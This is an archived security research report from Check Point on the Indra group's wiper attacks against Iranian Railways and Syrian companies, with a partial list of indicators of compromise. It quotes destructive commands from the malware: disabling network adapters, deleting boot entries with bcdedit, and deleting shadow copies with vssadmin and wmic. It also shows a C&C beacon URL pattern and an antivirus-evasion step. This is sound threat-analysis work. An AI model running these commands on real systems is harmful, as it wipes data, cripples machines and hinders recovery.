{
	"id": "afcddcd2-71e2-4a78-b085-fc54d4791bca",
	"created_at": "2026-04-06T00:18:59.599334Z",
	"updated_at": "2026-04-10T03:35:19.902393Z",
	"deleted_at": null,
	"sha1_hash": "6713bb014aef8caa0bbf5b439368d6bce119664d",
	"title": "Indra — Hackers Behind Recent Attacks on Iran - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 212250,
	"plain_text": "Indra — Hackers Behind Recent Attacks on Iran - Check Point\r\nResearch\r\nBy itayc\r\nPublished: 2021-08-14 · Archived: 2026-04-05 15:04:59 UTC\r\nIntroduction\r\nThese days, when we think of nation-state level damage, we immediately think of the nation-state level actor that\r\nmust be responsible for it. While most attacks against a nation’s sensitive networks are indeed the work of other\r\ngovernments, the truth is that there is no magic shield that prevents a non-state sponsored entity from creating the\r\nsame kind of havoc, and harming critical infrastructure in order to make a statement.\r\nIn this piece, we present an analysis of a successful politically motivated attack on Iranian infrastructure that is\r\nsuspected to be carried by a non-state sponsored actor. This specific attack happened to be directed at Iran, but it\r\ncould as easily have happened in New York or Berlin. We’ll look at some of the technical details and expose the\r\nactor behind the attack — thereby linking it to several other politically motivated attacks from earlier years.\r\nKey Findings\r\nOn July 9th and 10th, 2021 Iranian Railways and the Ministry of Roads and Urban Development systems\r\nbecame the subject of targeted cyber attacks. Check Point Research investigated these attacks and found\r\nmultiple evidence that these attacks heavily rely on the attacker’s previous knowledge and reconnaissance\r\nof the targeted networks.\r\nThe attacks on Iran were found to be tactically and technically similar to previous activity against multiple\r\nprivate companies in Syria which was carried at least since 2019. We were able to tie this activity to a\r\nthreat group that identify themselves as regime opposition group, named Indra.\r\nDuring these years, the attackers developed and deployed within victims’ networks at least 3 different\r\nversions of the wiper dubbed Meteor, Stardust, and Comet. Judging by the quality of the tools, their modus\r\noperandi, and their presence on social media, we find it unlikely that Indra is operated by a nation-state\r\nactor.\r\nA technical analysis of the tools, as well as the TTPs used by the underlying actor, are thoroughly described\r\nin this article. We share with the public Yara rules and a full list of indicators of compromise.\r\nOn Friday, July 9th, Iran’s railway infrastructure came under cyber-attack. According to Iranian news reports,\r\nhackers displayed messages about train delays or cancellations on information boards at stations across the\r\ncountry, and urged passengers to call a certain phone number for further information. This number apparently\r\nbelongs to the office of the country’s supreme leader, Ayatollah Ali Khamenei.\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 1 of 35\n\n“Long delays due to cyber attacks. More information: 64411” message containing the Supreme\r\nLeader office number displayed on Iran’s railways’ stations boards. Image published by the media.\r\nThe very next day, July 10th, websites of Iran’s Ministry of Roads and Urbanization reportedly went out of service\r\nafter another “cyber-disruption”. Iranian social media spread the photos of a monitor of one of the hacked\r\ncomputers, where the attackers took responsibility for both consecutive attacks.\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 2 of 35\n\n“We attacked the computer systems of the Railway Company and the Ministry of Roads and Urban\r\nDevelopment”. The message left by attackers on hacked machines\r\nA few days later, Iranian cybersecurity company Amnpardaz Software published a short technical analysis of a\r\npiece of malware supposedly related to these attacks, dubbed Trojan.Win32.BreakWin . Based on the information\r\npublished, Check Point Research Team retrieved the files from publicly available resources and conducted a\r\nthorough investigation of them. The findings shared in this report were reviewed and evaluated by journalists and\r\nfellow researchers from other security vendors. During this time, SentinelOne released a report based on\r\nAmnpardaz’s analysis.\r\nIn this article, we first analyze the artifacts left by these attacks. Based on this analysis, we uncover a set of similar\r\ntools previously used in other operations during 2019-2020: carried against multiple targets in Syria, they did not\r\nattract much public attention at the time. We then share some insights into the tactics, techniques, and procedures\r\n(TTPs) of the underlying actor, which self-identifies as “Indra” and, according to some Iranian sources, may have\r\nties to hacktivist or cybercriminal groups.\r\nHunting for the files from the Iranian hack\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 3 of 35\n\nWith Amnpardaz’s threat database as our starting point, we searched for files with similar names and functionality.\r\nThe search led us to dozens of files, all uploaded from the same two sources located in Iran. Even though we\r\nweren’t able to find all the mentioned artifacts, we recovered most of the execution flow as described in\r\nAmnpardaz’s report.\r\nThe execution flow is heavily based on multiple layers of archives and Batch scripts. When detonated, they:\r\nAttempt to evade anti-virus detection\r\nDestroy the boot configuration data\r\nRun the final payloads that aim to lock and completely wipe the computers in the network.\r\nThe execution flow of the attacks against targets in Iran\r\nThe execution starts with pushing a scheduled task from the AD to all the machines via group policy. The task\r\nname is Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll and it mimics the AnalyzeSystem task\r\nperformed by Windows Power Efficiency Diagnostics report tool. The subsequent chain of .bat files and archives\r\nis intended to perform the following operations:\r\nFilter the target machines: setup.bat first checks if the hostname of the machine is one of the\r\nfollowing: PIS-APP , PIS-MOB , WSUSPROXY or PIS-DB . If so, it stops the execution and deletes the\r\nfolder containing the malicious script from this machine. PIS in the hostnames stands for Passenger\r\nInformation System, which is usually responsible among others for updating the platform boards with\r\nactual data, so attackers made sure their message to the Iranian public will be displayed properly.\r\nDownload the malicious files onto the machine: the same batch file downloads a cab archive named\r\nenv.cab from a remote address in the internal network:\r\n\\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab . The use of specific hostnames and internal paths\r\nindicates the attacker had prior knowledge of the environment.\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 4 of 35\n\nExtract and run additional tools: update.bat , which was extracted and started by setup.bat , uses the\r\npassword hackemall to extract the next stages: cache.bat , msrun.bat and bcd.bat .\r\nDisconnect the machine from all networks: the cache.bat script disables all the network adapters on the\r\nmachine with the following command: powershell -Command \"Get-WmiObject -class\r\nWin32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\" \u003e NUL\r\nPerform Anti-AV checks: the same cache.bat script also checks if Kaspersky Antivirus is installed on\r\nthe machine and if not, it adds all the files and folders related to the attack to the Windows Defender\r\nexclusion list and proceeds with the execution.\r\nCorrupt the boot: bcd.bat is used in order to harm the boot process. First, it tries to override the boot\r\nfile with new content and then deletes the different boot identifiers using Windows built-in BCDEdit tool:\r\nfor /F \"tokens=2\" %%j in ('%comspec% /c \"bcdedit -v | findstr identifier\"') do bcdedit /delete\r\n%%j /f\r\nRemove all the traces: the same bcd.bat in addition to boot override also removes Security, System and\r\nApplication Event Viewer logs from the system using wevtutil.\r\nUnleash the main payload: The msrun.bat script is responsible for unleashing the Wiper. It moves\r\nwiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only\r\nonce at 23:55:00.\r\nAnalysis of the main payload — The Wiper\r\nThe main payload of the attack is an executable named msapp.exe , and its purpose is to take the victim machine\r\nout of service by locking it and wiping its contents. Upon execution, the malware hides this executable’s console\r\nwindow to decrease the suspicion of vigilant victims.\r\nWiper configuration file\r\nThe wiper will refuse to function unless it is provided a path to an encrypted configuration file msconf.conf as a\r\ncommand-line argument. The configuration file allows some degree of flexibility during the execution of the\r\npayload and gives the attacker the ability to tailor the attack to specific victims and systems. A helper script to\r\ndecrypt the configuration file is available in Appendix C.\r\nThe configuration format used supports multiple fields, which jointly hint at this binary’s role in the attack.\r\nSupported Configuration Fields\r\nauto_logon_path log_file_path\r\ncleanup_scheduled_task_name log_server_ip\r\ncleanup_script_path log_server_port\r\nis_alive_loop_interval paths_to_wipe\r\nlocker_background_image_jpg_path process_termination_timeout\r\nlocker_background_image_bmp_path processes_to_kill\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 5 of 35\n\nlocker_exe_path self_scheduled_task_name\r\nlocker_installer_path state_encryption_key\r\nlocker_password_hash state_path\r\nlocker_registry_settings_files users_password\r\nlog_encryption_key wiping_stage_logger_interval\r\nNot all these fields were actually used in the configuration file of the wiper targeting the Iranian networks, which\r\nmight suggest that the tool was not created specifically for this attack (or otherwise, that its design fell victim to\r\npremature optimization).\r\nIf the configuration is parsed successfully, the program writes the string \"Meteor has started.\" to an encrypted\r\nlog file, suggesting that the internal name of the malware is “ Meteor “. As we will see later on in this article,\r\nanother name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its\r\nactions to this same encrypted log file. These detailed debug logs make it easier to analyze the malicious binary\r\nand understand its workflow. Appendix C contains a helper script to decrypt the log file.\r\nConfiguration steps\r\nThe malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is\r\nremoved from the Active Directory domain by using WinAPI or WMI. This makes it harder to remotely push any\r\nremediation tools to the infected machines. Next, the malware proceeds to corrupt the computer’s boot\r\nconfiguration: in versions of Windows prior to Windows 7, the malware overrides the c:\\boot. ini file; in Windows\r\n7 and above, it deletes the BCD entries. Finally, the malware changes the password of the local users. In the files\r\nanalyzed, all the passwords chosen by the actor have the same pattern: Aa153![random sequence] , for example\r\nAa153!rHrrdOvpCj or Aa153!IRro3d2JYm .\r\nWhen all the above is said and done, the user will not recover access to their machine easily. At this stage the\r\nmalware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen images\r\nto a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran’s Railways\r\nand the message similar to the one displayed on the platform boards of different railway stations in Iran:\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 6 of 35\n\n“Long delays due to cyber attacks. More information: 64411” message on the desktop wallpaper set\r\nup by the malware\r\nSomething about this “long delays due to cyber attacks” message just tickles our fancy, and betrays a somewhat\r\nsurrealistic sense of humor on the attackers’ part. They could have written anything, but they chose that.\r\nWith the above done, the malware logs off all users and executes a small program — a “locker” — in a new\r\nthread. The path to the locker file named mssetup.exe is retrieved from the configuration. mssetup.exe will\r\nprevent the user from interacting with the machine by blocking inputs from the keyboard and mouse devices.\r\nFinally, before moving to its main cause — wiping the system — the malware creates a scheduled task that\r\nassures its own persistence in the system. The scheduled task will be executed every time the system starts.\r\nAs an aside, there is an extra step that didn’t take place in this specific attack; the malware is supposed to\r\nterminate all processes named in a processes_to_kill list specified in the configuration file. As it happens, the\r\nconfigurations used in the attacks against the Iranian targets did not contain this list, and so no processes were\r\nterminated. We will later show configuration files from previous attacks that did indeed use this feature.\r\nWiper functionality\r\nInternally, this part is called \"Prefix Suffix wiper\" . As its name suggests, the malware gets a list of prefixes\r\nand suffixes from the configuration file and wipes the files that are matched by this rule. Another string in the\r\nmalware — \"Middle Wiper\" — was probably used by this malware in the past in order to wipe the files that\r\ncontain some unique substrings.\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 7 of 35\n\nThe wiping procedure itself is pretty simple. First, the malware goes over the files and directories from the\r\npaths_to_wipe config, fills them with zero-bytes instead of their real content, and then deletes them.\r\nAfter the wiping procedure, the malware tries to delete the shadow copies by running the following commands:\r\nvssadmin.exe delete shadows /all /quiet **and ** C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy\r\ndelete . Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value\r\nfrom the configuration file and writes \"Meteor is still alive.\" to the log in every iteration.\r\nIf all this rings familiar to you, it should; it’s all straight out from the ransomware playbook — except this isn’t\r\nransomware, which requires delicate orchestration of public-key and private-key cryptography to make the\r\nmachine ultimately recoverable; this is Nuke-it-From-Orbit-ware. It’s a one-way trip.\r\nConnecting the files to the recent attacks against Iranian targets\r\nOur analysis of the files aligns with the analysis conducted by Amnpardaz. The flow of the attack is almost\r\nidentical; the files have similar structure, the same names and the same functionality. With that said, there are still\r\nsome differences. For example, the update.bat script that we analyzed is not used by the earlier variants, which\r\ninstead execute nti.exe — an MBR infector based on the one used by NotPetya. Another example is a slight\r\ndifference between the configuration shown in the Amnpardaz report and the configuration that we analyzed. The\r\nminor differences are in the paths_to_wipe key:\r\nWiper configuration file shared by Amnpardaz (on the left) and decrypted configuration file of the\r\nanalyzed sample (sha256:\r\n68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7)\r\nSome of the files we’ve found contain artifacts that tie them to the attack against Iran Railways. One of them is\r\nthe image the attackers used when replacing the victim’s wallpaper and lock screen image. As we mentioned\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 8 of 35\n\nbefore, the text that is showed is identical to the text the attackers displayed on the train stations.\r\nTrain station board (on the left) shows the same message as wallpaper installed by the malware (on\r\nthe right)\r\nOther pieces in the files we analyzed contain names and other artifacts from Iran Railways’ internal network,\r\nincluding computer names and internal Active Directory object names. For example, the envxp.bat\r\n( 67920ff26a18308084679186e18dcaa5f8af997c7036ba43c2e8c69ce24b9a1a ) file delivered a payload using a\r\nshared directory under the \\\\railways.ir machine:\r\nSET dirPath=c:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Sounds\r\nSET cabRemotePath=\"\\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab\"\r\nSET cabLocalPath=\"%dirPath%\\env.cab\"\r\n@echo off SET dirPath=c:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Sounds SET\r\ncabRemotePath=\"\\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab\" SET cabLocalPath=\"%dirPath%\\env.cab\" ...\r\n@echo off\r\nSET dirPath=c:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Sounds\r\nSET cabRemotePath=\"\\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab\"\r\nSET cabLocalPath=\"%dirPath%\\env.cab\"\r\n...\r\nThis can suggest that the attackers had access to the system prior to unleashing the wiper. An article by the IRNA\r\nalso mentions that experts who analyzed the attacks believe that they took place at least one month before being\r\nidentified.\r\nAttacks Against Companies in Syria\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 9 of 35\n\nHunting for more files\r\nEquipped with the information gathered so far, we went for a hunt to find more samples. Specifically, to find\r\nwhether the attack on the Iranian targets was the first time that the attackers utilized these tools. Our queries\r\nquickly yielded results — files that were uploaded to Virus Total by three different submitters located in Syria.\r\nThe files seemed to belong to three separated incidents and were uploaded to VT in January, February and April\r\n2020, more than a year before the recent attacks against the entities in Iran.\r\nThe main payloads ( d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e ,\r\n6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4 , and\r\n9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473 ) appear to be the early versions of the\r\nMeteor wiper that was used against the targets in Iran. Similar to Meteor , they also contain multiple debug\r\nstrings, which disclose the internal name of these versions of the wiper — Stardust and Comet . Out of these\r\ntwo versions, Comet is the older one, compiled back in September 2019. While we have the complete execution\r\nflow of the two attacks that utilized Stardust , we only have a partial view of the one where Comet was used.\r\nFor this reason, we will focus more on the execution chain of Stardust .\r\nUnlike the recent attacks where the Batch files were used during early infections stages, these Stardust\r\nexecutions are based on multiple VBS scripts. What’s more, these scripts contain valuable information — the\r\nidentities of the attacks’ targets.\r\nThe execution flow of the attacks against the Syrian companies.\r\nThe execution flows of both attacks leveled at Syria in which Stardust was deployed are very similar and thus\r\nthey will be described together. The initial payload that runs on the victim’s machine appears to be a VBS script\r\nresolve.vbs that extracts a password-protected RAR archive to the working folder C:\\\\Program\r\nFiles\\\\Windows NT\\\\Accessories\\\\ . This RAR contains another RAR file and three other VBS files. Then, the\r\nresolve.vbs script runs the extracted scripts in the following order:\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 10 of 35\n\n1. The first script iterates over the installed programs and checks if Kaspersky Antivirus is installed. If so, it\r\ntries to uninstall it using hardcoded domain credentials.\r\n2. The second script starts by checking if Kaspersky’s avp.exe process is running, and if so it tries to\r\nremove the Kaspersky license.\r\n3. The last script extracts the second-stage RAR archive and runs an executable file that the archive contains.\r\nThis stage is the earlier mentioned Stardust variant of the wiper.\r\nDuring the execution of these scripts, several requests are made to a server in order to trace the different steps of\r\nthe execution. These are GET requests to a URL with the following pattern, where C\u0026C IP is different between\r\nthe attacks.\r\nhttps://\u003cC\u0026C IP\u003e/progress.php?hn=\u0026dt=\u0026st=\u0026rs=\r\nhttps://\u003cC\u0026C IP\u003e/progress.php?hn=\u0026dt=\u0026st=\u0026rs=\r\nhttps://\u003cC\u0026C IP\u003e/progress.php?hn=\u0026dt=\u0026st=\u0026rs=\r\nwhere:\r\nhn = the Host Name\r\ndt = the Current Date and Time\r\nst = the Current Step\r\nrs = the Kaspersky AV running information\r\nEvolution of a Wiper\r\nThe wiper was the final payload used in all four incidents. The different names — Meteor , Stardust or\r\nComet , depending on the version — weren’t the only difference between the variants. During the evolution of 3\r\ngenerations, the attackers introduced several changes in the tool, some are more significant than others. Key\r\nchanges between the different variants of the wiper are explained below.\r\nComet is the earliest variant we have, and it might as well be the first to be created. Unlike Stardust and\r\nMeteor , it does reference and makes use of all the strings and features inside it. The others contained the\r\nartifacts, while the code itself did not utilize them. Comet has a Kill Switch based on values from the config file\r\nincluding the server IP, port, URL path, and a number of requests to perform before aborting. It tries to connect to\r\nthe server and if it doesn’t get a response, or the response status is not 200 OK it aborts. In addition, the oldest\r\nvariant creates a user as an Administrator using NetUserAdd and NetLocalGroupAddMembers APIs. Then it\r\ndisables the first logon animation, as well as the first logon Privacy Settings screen. Finally, it adds itself to the\r\nauto logon based on a path it has in its configuration.\r\nUnlike Meteor, Stardust and Comet do not override the boot. ini file during their attempts to corrupt the boot\r\nconfiguration. This feature, only relevant for Windows versions prior to Windows 7, only exists in the Meteor\r\nversion. The earliest version, Comet, does not contain the ability to corrupt boot configurations at all.\r\ndefault=multi(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 11 of 35\n\nmulti(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS=\"Microsoft Windows XP Professional\"\r\n/noexecute=optin /fastdetect\r\n[boot loader] timeout=0 default=multi(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS [operating\r\nsystems] multi(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS=\"Microsoft Windows XP Professional\"\r\n/noexecute=optin /fastdetect\r\n[boot loader]\r\ntimeout=0\r\ndefault=multi(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS\r\n[operating systems]\r\nmulti(0)disk(10000000)rdisk(0)partition(1000000)\\WINDOWS=\"Microsoft Windows XP Professional\" /noexecu\r\nThe content Meteor writes to boot. ini.\r\nStardust and Comet use “Lock My PC 4”, a tool that restricts unauthorized use which used to be publicly\r\navailable. After running the Lock My PC program, they remove the “hkSm” registry value to delete the generated\r\nlock password, then delete the uninstaller of the tool to make it harder to recover system functionality. This\r\nfunctionality is not used in Meteor , even though it has related artifacts.\r\nThe configuration files used in the attacks against the Syrian targets utilized more fields than the configurations\r\nthat were used against the Iranian targets. These fields include process_to_kill , paths_to_wipe ,\r\nlog_server_ip , and log_server_port . Their content sheds the light on the targets of these operations and\r\nindicates that the attacker had access to the targeted networks prior to deploying the final attack.\r\nThe log_server_ip and log_server_port configuration fields are used by the Stardust wiper to send a\r\nBase64-encoded log file to the remote server. The request is sent via HTTP POST to the data.html resource on\r\nthe server. The configs that we obtained contain different values for the servers, disclosing two IP addresses that\r\nwere used by the attackers.\r\nWho are the targets?\r\nMultiple artifacts that were inspected during the analysis of these two Stardust operations in Syria point to the\r\ntargeted companies — Katerji Group and its related company Arfada Petroleum — both located in Syria. First,\r\nthe names of these companies appear in the VBS files as the parameters for the commands they executed to\r\ndisable the Kaspersky AV. Another indication is the paths listed under the paths_to_wipe field in both\r\nconfigurations. These paths contain a list of user names, including the domain administrators of these two\r\ncompanies.\r\n\"c:\\\\\\\\Users\\\\\\\\administrator.ARFADA\\\\\\\\Desktop\",\r\n\"c:\\\\\\\\Users\\\\\\\\administrator.ARFADA\\\\\\\\Documents\",\r\n\"paths_to_wipe\": [ [...] \"c:\\\\\\\\Users\\\\\\\\administrator.ARFADA\\\\\\\\Desktop\",\r\n\"c:\\\\\\\\Users\\\\\\\\administrator.ARFADA\\\\\\\\Documents\", [...]\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 12 of 35\n\n\"paths_to_wipe\": [\r\n [...]\r\n \"c:\\\\\\\\Users\\\\\\\\administrator.ARFADA\\\\\\\\Desktop\",\r\n \"c:\\\\\\\\Users\\\\\\\\administrator.ARFADA\\\\\\\\Documents\",\r\n [...]\r\n\"c:\\\\\\\\Users\\\\\\\\administrator.KATERJIGROUP\\\\\\\\Desktop\",\r\n\"c:\\\\\\\\Users\\\\\\\\administrator.KATERJIGROUP\\\\\\\\Documents\",\r\n\"paths_to_wipe\": [ [...] \"c:\\\\\\\\Users\\\\\\\\administrator.KATERJIGROUP\\\\\\\\Desktop\",\r\n\"c:\\\\\\\\Users\\\\\\\\administrator.KATERJIGROUP\\\\\\\\Documents\", [...]\r\n\"paths_to_wipe\": [\r\n [...]\r\n \"c:\\\\\\\\Users\\\\\\\\administrator.KATERJIGROUP\\\\\\\\Desktop\",\r\n \"c:\\\\\\\\Users\\\\\\\\administrator.KATERJIGROUP\\\\\\\\Documents\",\r\n [...]\r\nMeet Indra\r\nOur scrutiny revealed not only the attacks’ targets, but also the identity of the group behind these operations — a\r\ngroup that calls itself “Indra” after the Hindu God of War. In fact, Indra did not try to hide that they are\r\nresponsible for these operations, and left their signature in multiple places.\r\nThe image that was displayed by the attackers on the victims’ locked computers announces “I am Indra” and takes\r\nthe responsibility for the attacks on Katerji group.\r\nWallpaper set up by the Indra actor on victims machines, taking responsibility for the attacks and\r\nblaming the Katerji Group for “supporting terrorists” and “trading souls”\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 13 of 35\n\nIndra takes responsibility for the attack in which it deployed “Comet”.\r\nIn addition, all samples of the wiper but Meteor , contain multiple occurrences of the string “INDRA”. It is used\r\nby the Comet variant as the username of a newly created Administrator account. On Stardust though, it serves\r\nas an inert artifact, and is not involved in execution.\r\nINDRA string inside the Stardust wiper\r\nWe wondered whether this Indra attack group has any online presence, and in fact, they do. They operate multiple\r\nsocial network accounts on different platforms, including Twitter, Facebook, Telegram, and Youtube. Among other\r\ninformation, the accounts contain the disclosure of the attacks on the aforementioned companies:\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 14 of 35\n\nIndra group Twitter account takes responsibility for the attacks on Arfada\r\nSurveying this social network activity, one can get an idea of the group’s political ideology and motive for the\r\nattack, and even hear about some of the group’s previous operations.\r\nThe title of INDRA’s official twitter account states that they are “aiming to bring a stop to the horrors of QF and\r\nits murderous proxies in the region” and they claim to be very focused on attacking different companies who\r\nallegedly cooperate with the Iranian regime, especially with the Quds-Force and Hezbollah. Their posts are all\r\nwritten in English or Arabic (both don’t seem to be their native language), and most talk about opposing terror or\r\noffer document leaks from the various different companies that fell victim to the group’s attacks due to suspected\r\nties to the Iranian Quads Force.\r\nIn their first message, posted September 2019, INDRA claims to have carried out a successful attack against the\r\ncompany Alfadelex, demolished their network, and leaked the customers’ and employees’ data. One of the pictures\r\nthat were posted by Indra from the hack against Alfadelex shows a webcam photo of a person sitting in front of a\r\ncomputer as they were watching the image we found used by Comet on their screen (one can only imagine how\r\nthey felt at that moment). Another image, displayed on Alfadelex’s website, has the same background as the other\r\nimages we found used in the attacks against Alfadelex, Katerji, and Arfada.\r\nThis background image also appears as the cover photo of Indra’s Twitter and Facebook accounts.\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 15 of 35\n\nPrevious Indra Operations\r\nSumming up the social network activity of Indra, the actors claim to be responsible for the following attacks:\r\nSeptember 2019: an attack against Alfadelex Trading, a currency exchange and money transfer services\r\ncompany located in Syria.\r\nJanuary 2020: an attack against Cham Wings Airlines, a Syrian-based private airline company.\r\nFebruary 2020 and April 2020: seizure of Afrada’s and Katerji Group’s network infrastructure. Both\r\ncompanies are situated in Syria as well.\r\nNovember 2020: Indra threatens to attack the Syrian Banias Oil refinery, though it is not clear whether the\r\nthreat was carried out.\r\nAround November 2020, all of Indra’s accounts fell silent. We weren’t able to find evidence of any additional\r\noperations until this latest one.\r\nConnecting Indra to the Attacks on Iranian Targets\r\nThe series of attacks on Syrian targets in 2019 and 2020 bears multiple similarities to the campaigns against the\r\nIranian networks. These are similarities in the tools, the Tactics, Techniques and Procedures (TTP), as well as in\r\nthe highly targeted nature of the attack, and they make us believe that Indra is also responsible for the recent\r\nattacks in Iran.\r\nThe attacks are all directed against Iranian-related targets, whether it is Iran Railways and Iran’s Ministry\r\nof Roads in 2021, or Katerji, Arfada, Alfadelex, and other Syrian companies targeted in 2020 and 2019.\r\nIndra’s tweets and posts make it clear that they are targeting entities that they believe have ties with Iran.\r\nThe multi-layered execution flow in all the attacks we analyzed — including the recent attacks against\r\nIranian targets — uses script files and archive files as their mean of delivery. The scripts themselves,\r\nalthough they are of different file types, had almost the same functionality.\r\nExecution flow relies on previous access and recon info about the targeted network. In case of Iranian\r\nintrusion, the attackers knew exactly which machines they need to leave unaffected in order to deliver their\r\nmessage publicly; furthermore, they had access to the railway’s Active Directory server which they used to\r\ndistribute the malicious files. Another indication for the reconnaissance done by Indra is the screenshot\r\nthey took from Alfadelex’s Web Camera, showing the office with an infected PC.\r\nThe wiper is the final payload deployed on the computers of the victims in all the aforementioned attacks.\r\nMeteor, Stardust, and Comet are different versions of the same payload, and we do not have an indication\r\nthat this tool was ever used by other threat actors.\r\nThe actor behind the attacks we analyzed did not try to keep their attack a secret. They shared messages\r\nand displayed pictures announcing the attacks. In the attacks against the Iranian targets, these messages\r\nwere displayed not only on affected computers but also on the platform boards.\r\nUnlike their previous operations, Indra did not publicly take responsibility for the attacks in Iran. This might be\r\nexplained by the seriousness of the new attacks, as well as their impact. While the attacks we inspected in Syria\r\nwere carried against private companies, the attacks against Iran Railways and the Ministry of Roads and\r\nUrbanization targeted official Iranian entities. Moreover, the attacks in Syria received little media attention,\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 16 of 35\n\nwhereas the attacks against the Iranian government were covered extensively all over the world and reportedly\r\ncaused the Iranians some amount of grief.\r\nConclusion\r\nBy carrying out an analysis of this latest attack against Iran, we were able to reveal its convoluted execution flow\r\nas well as 2 additional variants of the final ‘wiper’ component. These tools, in turn, were used previously in\r\nattacks against Syrian companies, for which the threat actor Indra took responsibility officially on their social\r\nmedia accounts. While Indra chose not to take responsibility for this latest attack against Iran, the similarities\r\nabove betray the connection.\r\nThere are two lessons to be learned from this incident.\r\nFirst, anonymity is a one-way street. Once you sacrifice it to reap PR and obtain some sweet likes on Twitter, it is\r\nnot so easily recovered. You can stop broadcasting your actions to the entire world and you might think that\r\nyou’ve gone under the radar, but The Internet Remembers, and given enough motivation, it will deanonymize you,\r\neven if you’re a badass hacktivist threat actor.\r\nSecond, that we should be more worried about attacks that are entirely possible but “clearly aren’t going to\r\nhappen” according to the calculus of prevailing common wisdom. With all the trouble caused by cybercrime,\r\nhacktivism, nation-state meddling and so forth and so on, the extent and sophistication of attacks in general is still\r\na fraction of its complete potential; oftentimes, threat actors don’t do X, Y, Z even though they perfectly well\r\ncould, and we come to rely on this truancy like it were a law of nature.\r\nCases like this, where said threat actors go ahead and do X, Y, Z, ought to raise our collective level of anxiety. As\r\nwe said in the opening statement, this attack happened in Iran, but next month an equivalent attack could be\r\nlaunched by some other group targeting New York, and Berlin the month after that. Nothing prevents it, except\r\nthreat actors’ limited patience, motivation and resources, which — as we’ve clearly just seen — are sometimes not\r\nso limited after all.\r\nAppendix A – Indicators of Compromise\r\nSamples:\r\n5e3e9ac6e280d8f7fa0e29707d32ce63, 6dc64e916faaf7cb26c7019e3d1e9c423550e2bd,\r\n6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\r\n685632a50d8c514a09882f24165741c3, 864667b969b7b31e8975700c4e9236390a250118,\r\nd71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\r\n04633656756847a79c7a2a02d62e5522, 86e4f73c384d84b6ecd5ad9d7658c1cc575b54df,\r\n2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\r\nbd5acbbfc5c2c8b284ec389207af5759, c71b6cd6a46494e9132da20a6bacfe0b870a460e,\r\n9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 17 of 35\n\naad0e2a996a0b1602f5716f1b9615631, acc58db9a430be2a385d046634b26c5f88b839a0,\r\n7ad16dab6f066ec559e11ead2d9da8755d03273b1c5d374a3f59dd421c417f5a\r\nf034755abb5ba85c7d24660668f8e710, b3f5cc0288dce893cb5b4716f30b535e862dd3e6,\r\n0f941dea21337420610164da04fa2c3c929b2685363e79e5b70818cd43b3aa13\r\n8420afcab941d1fdf78acd1795c7119a, b21bde15f12e30f9b8c167716da2d3d46c33f71b,\r\nb75a962528123df9d773baa86215d9b9c6d0b85bf8364e4e553d7b64a4a9f532\r\ne1cd6d256f1eb0670f3149f5beb56ee6, 296c1c077d00eeca273fdb8bd3dc79fd32ed20b4,\r\neb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\r\n8c14e57367fa096afebb94260301ed48, 